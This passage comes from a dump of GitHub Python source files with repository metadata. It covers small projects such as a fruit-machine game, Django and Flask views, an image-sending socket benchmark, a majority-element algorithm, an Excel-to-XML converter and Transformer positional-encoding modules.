[
"hirune525@gmail.com"
] |
hirune525@gmail.com
|
69d36472f023c18c789313fc3f812e22fad18dde
|
e18ea41e1ef08d8d2e6b335ae1a7b934d55ce9aa
|
/app/Game_Runner.py
|
2ac6e6284c59b8269bd77e0522253f7c41d922c5
|
[] |
no_license
|
Leigan0/fruit-machine
|
b27fd2530dad1eef3d255a700965e85679e6c977
|
f28f471816b8569c698a8b1362342ba2bee0a8b4
|
refs/heads/master
| 2020-03-12T00:29:15.017139
| 2018-05-07T19:30:55
| 2018-05-07T19:30:55
| 130,350,313
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
# coding: utf8
from app.Printer import Printer
class GameRunner:
def __init__(self, machine, player, printer=Printer()):
self.player = player
self.machine = machine
self.printer = printer
def spin_reel(self):
self.player.debit(self.machine.MINIMUM_BET)
self.printer.print_display(self.machine.spin_reel())
if (self.machine.prize_spin()) == True:
self._process_jackpot_win()
else:
self.printer.display_loss()
def _process_jackpot_win(self):
prize = self.machine.release_funds()
self.printer.display_prizefund(prize)
self.player.credit(prize)
|
[
"leighann.gant@gmail.com"
] |
leighann.gant@gmail.com
|
36ee9620eeabfe85272e2b9cc09128fdc7c88790
|
5fbcc0f81cf94cb5368fe4dc8f3139b56e093158
|
/beginer_to_advance/13_module_packages/testpackage/sub1/test.py
|
d6d63cf86c93bbdac6c8eae3bdd0fcfec03ef9d5
|
[] |
no_license
|
coolshree4u/repopydemo
|
ad54f263f1595cb5d374ba17f574e80b75503ff0
|
ccee973a4a616ac1aba36c74da4650a24bc1a536
|
refs/heads/master
| 2020-03-27T00:18:57.651363
| 2018-12-22T17:24:59
| 2018-12-22T17:24:59
| 145,611,907
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 71
|
py
|
# from testpackage.sub2.prime import sum_def as sum
#
# print(sum(5,6))
|
[
"mail.shree4u@gmail.com"
] |
mail.shree4u@gmail.com
|
26513b1575c8186088086d21ef93eef963590d67
|
2416f7be399dfe831ebb98578093db25886cc493
|
/send.py
|
ba411025da2b0ba4efda0cfb3f48dda497e52781
|
[] |
no_license
|
vithurson/CollabCam
|
1f91eb1167de5148eae034484b2d30aa42a491d8
|
ab5f144259118baf5c3b29eb215dd3da3ef6073d
|
refs/heads/main
| 2023-05-03T04:31:10.700984
| 2021-05-23T05:53:57
| 2021-05-23T05:53:57
| 347,302,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,024
|
py
|
import cv2
import sys
import time
import socket
import cv2
import numpy
res = [2100,1800,1500,1200,900,600,300]
#TCP_IP = '192.168.119.197'
TCP_IP = '192.168.86.80'
#TCP_IP = 'localhost'
TCP_PORT = 5003
cur_res = res[int(sys.argv[1])]
iters = int(sys.argv[2])
# Load .png image
image = cv2.imread('test.jpg')
crop_image = image[0:cur_res-1,0:cur_res-1]
# Save .jpg image
cv2.imwrite('image.jpg', crop_image, [int(cv2.IMWRITE_JPEG_QUALITY), 100])
sock = socket.socket()
sock.connect((TCP_IP, TCP_PORT))
frame= cv2.imread("image.jpg")
encode_param=[int(cv2.IMWRITE_JPEG_QUALITY),100]
result, imgencode = cv2.imencode('.jpg', frame, encode_param)
data = numpy.array(imgencode)
stringData = data.tostring()
lent = len(stringData)
start_time = time.time()
for i in range(iters):
start_time1 = time.time()
sock.send( str(lent).ljust(16).encode('utf-8'))
sock.send(stringData)
while((time.time()-start_time1)<0.0):
pass
end_time = time.time()
sock.close()
print("average :", (end_time-start_time)/iters)
|
[
"vithurson@github.com"
] |
vithurson@github.com
|
58a54fa4108cbfa79e7b0f6f78280f77e9ab15f5
|
0a6c04ce9a83c983558bf2a9b0622c0076b6b6c4
|
/snippets/permissions.py
|
27f7db6eab8cffcf6a64870e83d60a6a03fffc39
|
[] |
no_license
|
madhu0309/collaboratory
|
f4384affa8a489a1dc5b2614ac83d8ed2547dae1
|
5217d713d2a174e868a26ac9eb00836d006a09ad
|
refs/heads/master
| 2022-12-14T23:13:47.816593
| 2020-03-18T17:43:56
| 2020-03-18T17:43:56
| 235,501,050
| 1
| 0
| null | 2022-12-08T03:50:22
| 2020-01-22T04:52:31
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 356
|
py
|
from rest_framework import permissions
class IsOwnerOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.owner == request.user
|
[
"madhu@micropyramid.com"
] |
madhu@micropyramid.com
|
eb96c03c1a99cd953778d8898396878ba8f407c3
|
6f09363c63cbc4589c1435e2afecb05dc771bbe9
|
/movie/views.py
|
af2c3fd549a461f514ed15148f93477a263d0c15
|
[
"MIT"
] |
permissive
|
rocity/dj-model-demo
|
c87e4b8de596cdba413bb8c6b832043bad154dd7
|
8d83669aad8f5dbe2bfd2e265bdaf1a64c5fa1da
|
refs/heads/master
| 2021-01-20T18:39:00.277497
| 2017-05-11T01:50:42
| 2017-05-11T01:50:42
| 90,925,411
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 636
|
py
|
from django.shortcuts import render
from .models import Movie, Role, Actor, Salary
# Create your views here.
def index(request):
movies = Movie.objects.all()
for movie in movies:
movie.roles = Role.objects.filter(movie_id=movie.id)
for role in movie.roles:
actors = Actor.objects.filter(role_id=role.id)
role.actors = actors
try:
role.salary = Salary.objects.get(role_id=role.id)
except Exception as e:
role.salary = None
context = {
'movie_list': movies,
}
return render(request, 'movie/index.html', context)
|
[
"kevin@swiftkind.com"
] |
kevin@swiftkind.com
|
617e570784932d0851ca772715cf6f7e1136ccd4
|
bd4be765931f62c11408533a5f4c345cf2e231b2
|
/officialWebsite/podcast/views.py
|
6a57cae008e2e6dc538db4217c0475d52b717e27
|
[
"MIT"
] |
permissive
|
developer-student-club-thapar/officialWebsite
|
f5c654b6fa05cade7cc2434227039a065b42d715
|
34c50bf68f774fe0d5fdbf74498fac1347c263b6
|
refs/heads/master
| 2023-04-30T02:03:54.134765
| 2023-04-21T07:10:58
| 2023-04-21T07:10:58
| 227,199,721
| 24
| 93
|
MIT
| 2023-01-18T19:25:35
| 2019-12-10T19:31:06
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 895
|
py
|
from . import models
from . import serializers
from rest_framework import generics
from rest_framework.response import Response
from rest_framework.views import APIView
from officialWebsite import podcast
# Create your views here.
"""
Podcast
PodcastGuest
PodcastSeries
PodcastGuestLink
"""
class PodcastViewset(APIView):
"""Manage Podcasts in the database"""
def get(self, request, format=None):
podcasts = models.Podcast.objects.all()
serializer = serializers.PodcastSerializer(podcasts, many=True)
return Response(serializer.data)
# class podcast series
class PodcastSeriesViewset(APIView):
"""Manage Podcast Series in the database"""
def get(self, request, format=None):
series = models.PodcastSeries.objects.all()
serializer = serializers.PodcastSeriesSerializer(series, many=True)
return Response(serializer.data)
|
[
"raghav_tinker@yahoo.com"
] |
raghav_tinker@yahoo.com
|
05a2013983fd26dd25ee6bba308dd1777843f8e5
|
3786a455b602a4fa862dbfa43e72da52a06b394e
|
/apis/api_8.py
|
77a005a94ddaf665eb856e18c2a351432d650af5
|
[] |
no_license
|
lindvarl/MemoryLeak
|
82d56b093d4b2dff6ea8d7ac942491f83eb4b563
|
30054c44022adb436e0c91f99acca17674d27cb8
|
refs/heads/master
| 2020-09-08T04:31:53.511657
| 2019-11-13T09:49:52
| 2019-11-13T09:49:52
| 221,016,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 862
|
py
|
from flask import Flask, jsonify
import gc
import os
import logging
from objdict import ObjDict
from services.service import Service
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
from flask_restplus import Namespace, Resource
api = Namespace('Test8', description='Test 8')
service = Service()
@api.route('/thread')
class Endpoint(Resource):
"""Test 8 thread"""
@api.doc('Test 8')
def get(self):
logger.info("****************************************")
number_of_files = 100
result = service.get_blob_files_as_regularsurfaces(number_of_files)
l = len(result)
del result
gc.collect()
data = ObjDict()
data.number_of_thread = l
data.cpu_count = os.cpu_count()
data.gc_get_count = list(gc.get_count())
return jsonify(data)
|
[
"llag@equinor.com"
] |
llag@equinor.com
|
8b44374686ed67c1f722ee0b0e735e943092cf75
|
90e430684958ad7bde4c2a8b31fe34240a64b2d9
|
/test_pca.py
|
24ee36a20995dc9f65e5eb454ce6a9ff0b6e4901
|
[] |
no_license
|
caicharlesx/rmrepo_test1
|
808d7d5b9d280c7f1046d0e1bcc059ecd5e6bb02
|
3cf217be9e62e7ca0986c32100852a6fa9b2286f
|
refs/heads/main
| 2023-05-06T11:36:11.123213
| 2021-05-30T00:47:31
| 2021-05-30T00:47:31
| 372,088,676
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 93
|
py
|
X_centered = X - X.mean(axis=0)
U, s, V = np.linalg.svd(X_centered)
c1=V.T[:,0]
c2=V.T[:,1]
|
[
"cai.charles.x@gmail.com"
] |
cai.charles.x@gmail.com
|
072d93b784ff9415c8c17eaaa648d89e23b96c67
|
395907654b7d2c3794df4e5fea0b256faad5befe
|
/LibraryAPI/services/book_service.py
|
9dca5fa479f580ec62df037b8d77fa2f1bcc4351
|
[] |
no_license
|
syskantechnosoft/2105PythonBatch
|
9c67956ac7bba832cf21286dfb0e3421ff504e75
|
5d6ecbc6e9a4212e86a532dd749dbe79669f6931
|
refs/heads/main
| 2023-08-24T08:29:05.046864
| 2021-10-13T18:07:33
| 2021-10-13T18:07:33
| 429,123,329
| 1
| 0
| null | 2021-11-17T16:37:08
| 2021-11-17T16:37:07
| null |
UTF-8
|
Python
| false
| false
| 711
|
py
|
from abc import ABC, abstractmethod
from typing import List
from entities.book import Book
class BookService(ABC):
# general CRUD functionality
@abstractmethod
def add_book(self, book: Book):
pass
@abstractmethod
def retrieve_all_books(self):
pass
@abstractmethod
def retrieve_book_by_id(self, book_id: int):
pass
@abstractmethod
def update_book(self, book: Book):
pass
@abstractmethod
def remove_book(self, book_id: int):
pass
@abstractmethod
def find_books_by_tile_containing(self, phrase: str) -> List[Book]:
pass
@abstractmethod
def checkout_book(self, book_id: int) -> bool:
pass
|
[
"adaman94@gmail.com"
] |
adaman94@gmail.com
|
97bf914f49e40589d1141e279b72f8736167cf4a
|
9e64d40d36bd143c39b2e456a2576ab2b66c655d
|
/Activity/migrations/0001_initial.py
|
fcc392c76b6c8a869ace532d3543b944d77ae45f
|
[] |
no_license
|
RajuGujjalapati/DjangoApi
|
0ab9d951a5740a2458b0c080c68ab9fdea7804ce
|
de22ed6fa84eb28c0cfc49e53c68d73ae572fc3c
|
refs/heads/master
| 2022-11-09T05:51:03.482849
| 2020-06-22T05:40:43
| 2020-06-22T05:40:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 913
|
py
|
# Generated by Django 3.0.7 on 2020-06-20 14:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=20)),
('timezone', models.TimeField()),
],
),
migrations.CreateModel(
name='ActivityPeriod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Activity.User')),
],
),
]
|
[
"gujjalpatiraju@gmail.com"
] |
gujjalpatiraju@gmail.com
|
cc6bf555fa3f589bb8fc3e4b06e994e7daf6c6e6
|
d9ce16745c2075a6c65a4b6d52c8a47b20b74874
|
/39_MoreThanHalfNumber.py
|
b61de2a244c6ff7bfe04032c8eb7d685c3b2dd56
|
[] |
no_license
|
VCloser/CodingInterviewChinese2-python
|
150dbec390a95be50a76694387268324c6566094
|
1c963f69d8542f7741f7a07ff28e4de18d0f1377
|
refs/heads/master
| 2022-11-24T17:57:48.695231
| 2020-06-29T12:52:05
| 2020-06-29T12:52:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,851
|
py
|
import random
"""
解法一:基于Partition函数的时间复杂度为O(n)的算法
(即top n/2思想)
(修改原数组)
"""
def partition(arr, start, end):
if start<0 or end>len(arr):
return None
pvit = random.randint(start,end)
arr[pvit],arr[start] = arr[start],arr[pvit]
left = start+1
right = end
while True:
while left<=right and arr[left]<=arr[start]:
left+=1
while left<=right and arr[right]>=arr[start]:
right-=1
if left>right:
break
arr[left],arr[right] = arr[right],arr[left]
arr[start], arr[right] = arr[right], arr[start]
return right
def check_more_than_half(arr,target):
return arr.count(target)>len(arr)//2
def more_than_half_num_1(arr):
if not arr:
return
mid = len(arr)>>1
start = 0
end = len(arr)-1
index = partition(arr, start,end)
while (index != mid):
if index>mid:
end = index-1
index = partition(arr, start,end)
else:
start = index+1
index = partition(arr, start,end)
result = arr[mid]
if check_more_than_half(arr,result):
return result
return 0
"""
解法二:根据数组特点找出时间复杂度为O(n)的算法
(不修改原数组)
"""
def more_than_half_num_2(arr):
if not arr:
return
result = arr[0]
times = 1
for i in range(1,len(arr)):
if times ==0:
result = arr[i]
times= 1
else:
if arr[i] == arr[i-1]:
times+=1
else:
times-=1
if check_more_than_half(arr,result):
return result
return 0
if __name__ == '__main__':
print(more_than_half_num_1([1,2,3,2,2,2,5,4,2]))
print(more_than_half_num_2([1,2,3,2,2,2,5,4,2]))
|
[
"1991262239@qq.com"
] |
1991262239@qq.com
|
710be652a020afe84ea98e260f63caa0375f2e49
|
405f37478f35497ba16dbe3327011bde183bf39e
|
/skillStonesSettings.py
|
f431522770b346fb3ce25005ea289d3c495ba58f
|
[] |
no_license
|
shimdh/mrd_conv
|
0258e95b67c4bb9f6311a77587b2520098b3f134
|
2e092aab16b984d88aad0a509a1b3a2112346619
|
refs/heads/master
| 2021-01-19T06:53:09.298637
| 2013-07-02T10:20:53
| 2013-07-02T10:20:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,981
|
py
|
# -*- coding: utf-8 -*-
import codecs
import os
from xlrd import open_workbook
from xmlUtils import XmlWriter
statusKeys = []
statusKeysKorean = []
ITEMS_NAMES = []
ITEMS_DESCRIPTION = []
ITEMS_STATUS_LIST = []
STATUS_TAG = 'SkillStone'
SUB_PLURAL = 'SkillStone'
TAG_PLURAL = 's'
ITEMS_SETTINGS_FILE = SUB_PLURAL + TAG_PLURAL + 'Settings'
ITEMS_SETTINGS_XML_FILE = ITEMS_SETTINGS_FILE + '.xml'
ITEMS_SETTINGS_EXCEL_FILE = ITEMS_SETTINGS_FILE + '.xls'
wbItems = open_workbook(os.getcwd() + "\\xls\\" + ITEMS_SETTINGS_EXCEL_FILE)
for s in wbItems.sheets():
for row in range(s.nrows):
values = []
if row == 0:
continue
elif row == 1:
for col in range(s.ncols):
statusKeys.append(str(s.cell(row, col).value))
else:
for col in range(s.ncols):
# values.append(str(s.cell(row, col).value))
if col in (1, ):
values.append(unicode(s.cell(row, col).value))
if col == 1:
ITEMS_DESCRIPTION.append(unicode(s.cell(row, col).value))
else:
if col == 0:
ITEMS_NAMES.append(str(s.cell(row, col).value))
values.append(str(s.cell(row, col).value))
ITEMS_STATUS_LIST.append(values)
print statusKeys
print ITEMS_STATUS_LIST
doc = XmlWriter()
items_setting = doc.createNode(ITEMS_SETTINGS_FILE)
for index in range(len(ITEMS_STATUS_LIST)):
enemy_value = doc.createNode(STATUS_TAG, items_setting)
for key, value in zip(statusKeys, ITEMS_STATUS_LIST[index]):
node_key = doc.createNode(key, enemy_value)
node_value = doc.doc.createTextNode(value)
node_key.appendChild(node_value)
# doc.printXML()
def createXmlFile(file_name):
f = codecs.open(os.getcwd() + "\\xml\\" + file_name, 'w', 'utf-8')
f.write(doc.doc.toprettyxml())
f.close()
createXmlFile(ITEMS_SETTINGS_XML_FILE)
|
[
"shimdh@gmail.com"
] |
shimdh@gmail.com
|
a6824ae4180a13e222ee644e775d711df4dfd926
|
2cd980e7d2e60fe3b659d23ade346e651fe4f3bb
|
/Django/cloudms/cloudms/settings.py
|
3e0af5e43cb34e52a122e34905660185663cd3f1
|
[] |
no_license
|
nbgao/Python-Project
|
79666c86e68531c6a9312576785e88ebb028a68f
|
9665aec2adb9e85ec333a1bccc014d27b15b949a
|
refs/heads/master
| 2021-01-02T23:01:12.147940
| 2019-05-03T09:05:05
| 2019-05-03T09:05:05
| 99,439,676
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,131
|
py
|
"""
Django settings for cloudms project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$x#ie9g90-82lhsm!u_=3w80y%x)sd6t0!0kq_9l=au76e3=g@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'cloudms.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, "msgapp/templates")],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'cloudms.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"nbgao@126.com"
] |
nbgao@126.com
|
ff78da37b44bb65fde789b0424eb2ee373574348
|
b61435024bf60b1fb38b780bdcd4c7c8a10c0b5e
|
/users/migrations/0001_initial.py
|
1f9b7828edacf11667f5676ea0b2c303e4fd3d93
|
[] |
no_license
|
ysmt1/muaythaidb-V2
|
ff54f445c6b626fcd93ebfe1338eea4f83d9516c
|
cc705cc8d8b2cadc82b16bc303ef065f447138a3
|
refs/heads/master
| 2022-11-20T07:36:57.842490
| 2022-11-19T19:36:20
| 2022-11-19T19:36:20
| 225,264,459
| 1
| 0
| null | 2020-08-23T21:42:32
| 2019-12-02T02:05:11
|
Python
|
UTF-8
|
Python
| false
| false
| 1,174
|
py
|
# Generated by Django 2.2.5 on 2019-11-09 17:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('mtdb', '0002_auto_20191109_1102'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='TBA')),
('location', models.CharField(blank=True, max_length=200)),
('experience', models.CharField(blank=True, max_length=200)),
('fighter', models.CharField(blank=True, max_length=200)),
('checkin', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='mtdb.Gym')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"yosuke.seki@gmail.com"
] |
yosuke.seki@gmail.com
|
394d72d7e339049da0981c27d5ada941e57367d6
|
1bad3878c36e54a8da5af81a7ddae7495f7872a6
|
/codewars/7kyu/two_oldest_ages.py
|
8be6332bb674a5dbbad06f67604d7cd2ea960e3e
|
[] |
no_license
|
Codewithml/coding-problems-solutions
|
bb8e9f039d0864366739215da033515679e907ba
|
c2f7982c6c3d24d7ab384cd0d85bf242ca94b9ff
|
refs/heads/master
| 2023-02-04T20:06:58.072687
| 2020-12-29T10:04:17
| 2020-12-29T10:04:17
| 297,561,438
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 150
|
py
|
def two_oldest_ages(ages):
ages = sorted(ages)
return ages[-2:]
if __name__ == "__main__":
print(two_oldest_ages([1, 5, 87, 45, 8, 8]))
|
[
"codingwithml@gmail.com"
] |
codingwithml@gmail.com
|
0f698146fae3955d544faba816ebc4a3c9197b0c
|
a89c739589d0ee29ff6fff1a1508a426dfe4489a
|
/filehandling/writefile.py
|
0e672cf3be29baf61ed2400e2cf1332ce48c0309
|
[] |
no_license
|
macabdul9/python-learning
|
107e3533998e3f373b804d6b59152fc41938604b
|
f0d5e0e37cbed3d846684be80f0f92e5cbb9ceb5
|
refs/heads/master
| 2020-04-27T04:31:47.907486
| 2020-03-05T16:48:53
| 2020-03-05T16:48:53
| 174,057,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
@author : macab (macab@debian)
@file : writefile
@created : Wednesday Mar 20, 2019 22:46:12 IST
"""
def writefile():
myfile = open('firstfile.txt', 'wt')
myfile.write('adfhdsdssfsd\n')
myfile.writelines('asfssdhd\n')
myfile.write('sdfjhdsdasjdhfsdkasjfvd\n')
myfile.write('dsdfdsf vdvscdc fvdvsd\n')
myfile.write('fdjks')
if __name__ == "__main__":
writefile()
|
[
"abdulwaheed1513@gmail.com"
] |
abdulwaheed1513@gmail.com
|
86b7a832f9aa87fa331359ba471bc4bc5acd9411
|
46732d613208ee4096fbbd3fd74f22146471d1ce
|
/wangyiyun_songs&lyrics/all_singer歌手情绪分析/许巍/sentiments_test.py
|
c0df0d2f4a5e192faf3a2c8113832f326316fc06
|
[] |
no_license
|
cassieeric/python_crawler
|
7cb02f612382801ae024e2cee70e0c2bcdba927c
|
6d2b4db3d34183d729f6fd30555c6d6f04514260
|
refs/heads/master
| 2022-11-30T20:30:50.031960
| 2022-11-27T02:53:22
| 2022-11-27T02:53:22
| 118,204,154
| 322
| 283
| null | 2022-12-21T09:33:08
| 2018-01-20T03:17:14
|
HTML
|
UTF-8
|
Python
| false
| false
| 865
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from snownlp import SnowNLP
# 积极/消极
# print(s.sentiments) # 0.9769551298267365 positive的概率
def get_word():
with open("许巍歌词关键字.txt") as f:
line = f.readline()
word_list = []
while line:
line = f.readline()
word_list.append(line.strip('\r\n'))
f.close()
return word_list
def get_sentiment(word):
text = u'{}'.format(word)
s = SnowNLP(text)
print(s.sentiments)
if __name__ == '__main__':
words = get_word()
for word in words:
get_sentiment(word)
# text = u'''
# 也许
# '''
# s = SnowNLP(text)
# print(s.sentiments)
# with open('lyric_sentiments.txt', 'a', encoding='utf-8') as fp:
# fp.write(str(s.sentiments)+'\n')
# print('happy end')
|
[
"noreply@github.com"
] |
cassieeric.noreply@github.com
|
8a85a7f0d42f7a5fe8b24aa019620fd6764b2f8c
|
c955a679765e3f13e6b936b676ec6542374711fe
|
/04_dictionaries_lambdas_functional_programming/07_user_logins.py
|
970e35cfc8e4892d67159b0b3f3ccc1b06581027
|
[
"Apache-2.0"
] |
permissive
|
ivaylokanov/Python
|
6912eb35b0dcd0f88396483b6b104fb8b780dcd0
|
af219356d7034de3004a0012603654756d436c08
|
refs/heads/master
| 2018-07-06T12:28:58.596748
| 2018-05-31T23:35:29
| 2018-05-31T23:35:29
| 118,973,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 743
|
py
|
login_base = {}
counter = 0
while True:
array_users = [item for item in input().split(" -> ")]
if array_users[0] == "login":
break
else:
login_base[array_users[0]] = array_users[1]
while True:
array_logs = [item for item in input().split(" -> ")]
if array_logs[0] == "end":
break
else:
if array_logs[0] in login_base:
if array_logs[1] == login_base[array_logs[0]]:
print(f"{array_logs[0]}: logged in successfully")
else:
print(f"{array_logs[0]}: login failed")
counter += 1
else:
print(f"{array_logs[0]}: login failed")
counter += 1
print(f"unsuccessful login attempts: {counter}")
|
[
"kanov.ivo@gmail.com"
] |
kanov.ivo@gmail.com
|
6e246e7a9673615d7b3d613c7b5f03591fe7f6de
|
f24754d4491b3f84831185e1ba8314eea65ef734
|
/neural_sp/models/modules/positional_embedding.py
|
186973af546a9f5f7c63348ceb1995c4a4d09957
|
[
"Apache-2.0"
] |
permissive
|
ggsonic/neural_sp
|
a7e04bd397e702598aba091aa2142c09b0ba4b31
|
30fc2b799151e82ffb73c77972f9fd47a5b1fd11
|
refs/heads/master
| 2023-01-10T08:03:48.275303
| 2020-11-04T16:47:16
| 2020-11-04T16:47:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,543
|
py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2020 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Positional Embeddings."""
import copy
import logging
import math
import torch
import torch.nn as nn
from neural_sp.models.modules.causal_conv import CausalConv1d
logger = logging.getLogger(__name__)
class PositionalEncoding(nn.Module):
"""Positional encoding for Transformer.
Args:
d_model (int): dimension of MultiheadAttentionMechanism
dropout (float): dropout probability
pe_type (str): type of positional encoding
param_init (str): parameter initialization method
max_len (int): maximum lenght for sinusoidal positional encoding
conv_kernel_size (int): window size for 1dconv positional encoding
layer_norm_eps (float): epsilon value for layer normalization
"""
def __init__(self, d_model, dropout, pe_type, param_init, max_len=5000,
conv_kernel_size=3, layer_norm_eps=1e-12):
super().__init__()
self.d_model = d_model
self.pe_type = pe_type
self.scale = math.sqrt(self.d_model)
if '1dconv' in pe_type:
causal_conv1d = CausalConv1d(in_channels=d_model,
out_channels=d_model,
kernel_size=conv_kernel_size,
param_init=param_init)
layers = []
nlayers = int(pe_type.replace('1dconv', '')[0])
for _ in range(nlayers):
layers.append(copy.deepcopy(causal_conv1d))
layers.append(nn.LayerNorm(d_model, eps=layer_norm_eps))
layers.append(nn.ReLU())
layers.append(nn.Dropout(p=dropout))
self.pe = nn.Sequential(*layers)
elif pe_type != 'none':
# Compute the positional encodings once in log space.
pe = torch.zeros(max_len, d_model, dtype=torch.float32)
position = torch.arange(0, max_len, dtype=torch.float32).unsqueeze(1)
div_term = torch.exp(torch.arange(0, d_model, 2).float() * -(math.log(10000.0) / d_model))
pe[:, 0::2] = torch.sin(position * div_term)
pe[:, 1::2] = torch.cos(position * div_term)
pe = pe.unsqueeze(0) # for batch dimension
self.register_buffer('pe', pe)
self.dropout = nn.Dropout(p=dropout)
logger.info('Positional encoding: %s' % pe_type)
def forward(self, xs, scale=True):
"""Forward pass.
Args:
xs (FloatTensor): `[B, T, d_model]`
Returns:
xs (FloatTensor): `[B, T, d_model]`
"""
if scale:
xs = xs * self.scale
# NOTE: xs is an embedding before scaling
if self.pe_type == 'none':
xs = self.dropout(xs)
return xs
elif self.pe_type == 'add':
xs = xs + self.pe[:, :xs.size(1)]
xs = self.dropout(xs)
elif '1dconv' in self.pe_type:
xs = self.pe(xs)
else:
raise NotImplementedError(self.pe_type)
return xs
class XLPositionalEmbedding(nn.Module):
"""Positional embedding for TransformerXL."""
def __init__(self, d_model, dropout):
super().__init__()
self.d_model = d_model
inv_freq = 1 / (10000 ** (torch.arange(0.0, d_model, 2.0) / d_model))
self.register_buffer("inv_freq", inv_freq)
self.dropout = nn.Dropout(p=dropout)
def forward(self, xs, mlen=0, clamp_len=-1, zero_center_offset=False):
"""Forward pass.
Args:
xs (FloatTensor): `[B, L, d_model]`
mlen (int); length of memory
clamp_len (int):
zero_center_offset (bool):
Returns:
pos_emb (LongTensor): `[L, 1, d_model]`
"""
if zero_center_offset:
pos_idxs = torch.arange(mlen - 1, -xs.size(1) - 1, -1.0, dtype=torch.float, device=xs.device)
else:
pos_idxs = torch.arange(mlen + xs.size(1) - 1, -1, -1.0, dtype=torch.float, device=xs.device)
# truncate by maximum length
if clamp_len > 0:
pos_idxs.clamp_(max=clamp_len)
# outer product
sinusoid_inp = torch.einsum("i,j->ij", pos_idxs, self.inv_freq)
pos_emb = torch.cat([sinusoid_inp.sin(), sinusoid_inp.cos()], dim=-1)
pos_emb = self.dropout(pos_emb)
return pos_emb.unsqueeze(1)
|
[
"hiro.mhbc@gmail.com"
] |
hiro.mhbc@gmail.com
|
c761b34f0fd1c6ab9f45a9620395af8d6d4376ec
|
06fceff5ad47bcb4631dc7bfc8a42614501e72da
|
